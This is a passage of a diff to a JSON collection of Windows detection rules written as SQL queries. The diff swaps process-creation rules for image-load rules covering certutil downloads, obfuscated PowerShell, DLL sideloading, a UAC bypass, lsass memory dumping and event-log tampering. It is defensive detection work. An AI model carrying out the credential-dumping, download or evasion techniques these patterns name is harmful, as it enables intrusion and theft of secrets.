'%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '\tC:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_encoded_obfusc.yml" + "filename": "image_load_dll_vssapi_susp_load.yml" }, { - "title": "Suspicious Download Via Certutil.EXE", - "id": "19b08b1c-861d-4e75-a1ef-ea0c1baf202b", - "status": "test", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files.", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Antivirus Software DLL Sideloading", + "id": "552b6b65-df37-4d3e-a258-f2fc4771ae54", + "status": "experimental", + "description": "Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Applications that load the same dlls mentioned 
in the detection section. Investigate them and filter them out if a lot FPs are caused.", + "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", + "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((((((ImageLoaded LIKE '%\\\\log.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\TelemetryUtility.exe' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\plugin\\\\log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\log.dll' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Canon\\\\MyPrinter\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\qrt.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\')))) OR ((ImageLoaded LIKE '%\\\\ashldres.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockdown.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsodscpl.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\McAfee\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\McAfee\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\vftrace.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program 
Files\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\wsc.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\tmdbglog.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\DLPPREM32.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\ESET%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\ESET%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_certutil_download.yml" + "filename": "image_load_side_load_antivirus.yml" }, { - "title": "Control Panel Items", - "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", + "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", "status": "test", - "description": "Detects the malicious use of a control panel item", - "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218.002", - "attack.persistence", - "attack.t1546" + "attack.credential_access", + "attack.t1003.001" ], 
"falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" ], - "filename": "proc_creation_win_control_panel_item.yml" + "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" }, { - "title": "Potential Download/Upload Activity Using Type Command", - "id": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", + "title": "DLL Sideloading Of DBGCORE.DLL", + "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", "status": "experimental", - "description": "Detects usage of the \"type\" command to download/upload data from WebDAV server", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DLL sideloading of \"dbgcore.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > \\\\\\\\\\*' 
ESCAPE '\\') OR (CommandLine LIKE '%type \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_type.yml" + "filename": "image_load_side_load_dbgcore_dll.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher", - "id": "b222df08-0e07-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Potential DLL Sideloading Via comctl32.dll", + "id": "6360757a-d460-456c-8b13-74cf0e60cceb", + "status": "experimental", + "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE 
'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" + "filename": "image_load_side_load_comctl32.yml" }, { - "title": "Windows Update Client LOLBIN", - "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "title": "UAC Bypass Using Iscsicpl - ImageLoad", + "id": "9ed5959a-c43c-4c59-84e3-d28628429456", "status": "experimental", - "description": "Detects code execution via the Windows Update client (wuauclt)", - "author": "FPT.EagleEye Team", + "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1105", - "attack.t1218" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded 
LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wuauclt_execution.yml" + "filename": "image_load_uac_bypass_iscsicpl.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", - "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "title": "Time Travel Debugging Utility Usage - Image", + "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" + "filename": "image_load_tttracer_mod_load.yml" }, { - "title": "PUA - Nmap/Zenmap Execution", - "id": 
"f6ecd1cf-19b8-4488-97f6-00f0924991a3", - "status": "test", - "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", + "id": "75e508f7-932d-4ebc-af77-269237a84ce1", + "status": "experimental", + "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ - "Network administrator computer" + "Unikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nmap_zenmap.yml" + "filename": "image_load_cmstp_load_dll_from_susp_location.yml" }, { - "title": "Suspicious RASdial Activity", - "id": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", + "title": "GAC DLL Loaded Via Office Applications", + "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", "status": "test", - "description": "Detects suspicious process related to rasdial.exe", - "author": "juju4", + "description": "Detects any GAC DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - 
"attack.defense_evasion", "attack.execution", - "attack.t1059" + "attack.t1204.002" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%rasdial.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rasdial_execution.yml" + "filename": "image_load_office_dotnet_gac_dll_load.yml" }, { - "title": "Add User to Local Administrators Group", - "id": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", - "status": "experimental", - "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "WMIC Loading Scripting Libraries", + "id": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", + "status": "test", + "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1220" ], "falsepositives": [ - "Administrative activity" + "The command wmic os get 
lastboottuptime loads vbscript.dll", + "The command wmic os get locale loads vbscript.dll", + "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '% administrators %' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\jscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_add_user_local_admin_group.yml" + "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml" }, { - "title": "Suspicious Msiexec Quiet Install", - "id": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", + "title": "Potential DLL Sideloading Via JsSchHlp", + "id": "68654bf0-4412-43d5-bfe8-5eaa393cd939", "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.007" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName 
LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\Ccm32BitLauncher.exe' ESCAPE '\\' AND IntegrityLevel = 'System')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\JSESPR.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\Justsystem\\\\JsSchHlp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_install_quiet.yml" + "filename": "image_load_side_load_jsschhlp.yml" }, { - "title": "Potentially Over Permissive Permissions Granted Using Dsacls.EXE", - "id": "01c42d3c-242d-4655-85b2-34f1739632f7", - "status": "experimental", - "description": "Detects usage of Dsacls to grant over permissive permissions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Svchost DLL Search Order Hijack", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", + "status": "test", + "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code 
execution on a remote machine.\n", + "author": "SBousseaden", "tags": [ - "attack.execution", - "attack.t1218" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1574.001" ], "falsepositives": [ - "Legitimate administrators granting over permissive permissions to users" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND CommandLine LIKE '% /G %' ESCAPE '\\' AND (CommandLine LIKE '%GR%' ESCAPE '\\' OR CommandLine LIKE '%GE%' ESCAPE '\\' OR CommandLine LIKE '%GW%' ESCAPE '\\' OR CommandLine LIKE '%GA%' ESCAPE '\\' OR CommandLine LIKE '%WP%' ESCAPE '\\' OR CommandLine LIKE '%WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dsacls_abuse_permissions.yml" + "filename": "image_load_side_load_svchost_dlls.yml" }, { - "title": "Permission Check Via Accesschk.EXE", - "id": "c625d754-6a3d-4f65-9c9a-536aea960d37", - "status": "test", - "description": "Detects the usage of the \"Accesschk\" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", + "id": "48bfd177-7cf2-412b-ad77-baf923489e82", + "status": "experimental", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1069.001" + 
"attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "System administrator Usage" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%AccessChk' ESCAPE '\\' OR Description LIKE '%Reports effective permissions%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk64.exe' ESCAPE '\\') OR OriginalFileName = 'accesschk.exe') AND (CommandLine LIKE '%uwcqv %' ESCAPE '\\' OR CommandLine LIKE '%kwsu %' ESCAPE '\\' OR CommandLine LIKE '%qwsu %' ESCAPE '\\' OR CommandLine LIKE '%uwdqs %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sysinternals_accesschk_check_permissions.yml" + "filename": "image_load_dll_vsstrace_susp_load.yml" }, { - "title": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet", - "id": "c8a180d6-47a3-4345-a609-53f9c3d834fc", + "title": "HackTool - SharpEvtMute DLL Load", + "id": "49329257-089d-46e6-af37-4afce4290685", "status": "experimental", - "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the load of 
EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.001" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Administrative activity" + "Other DLLs with the same Imphash" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Get-LocalGroupMember %' ESCAPE '\\' AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b')" ], - "filename": "proc_creation_win_powershell_get_localgroup_member_recon.yml" + "filename": "image_load_hktl_sharpevtmute.yml" }, { - "title": "Blue Mockingbird", - "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", - "status": "test", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "title": "UIPromptForCredentials DLLs", + "id": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", + "status": "experimental", + "description": "Detects potential use of UIPromptForCredentials functions by 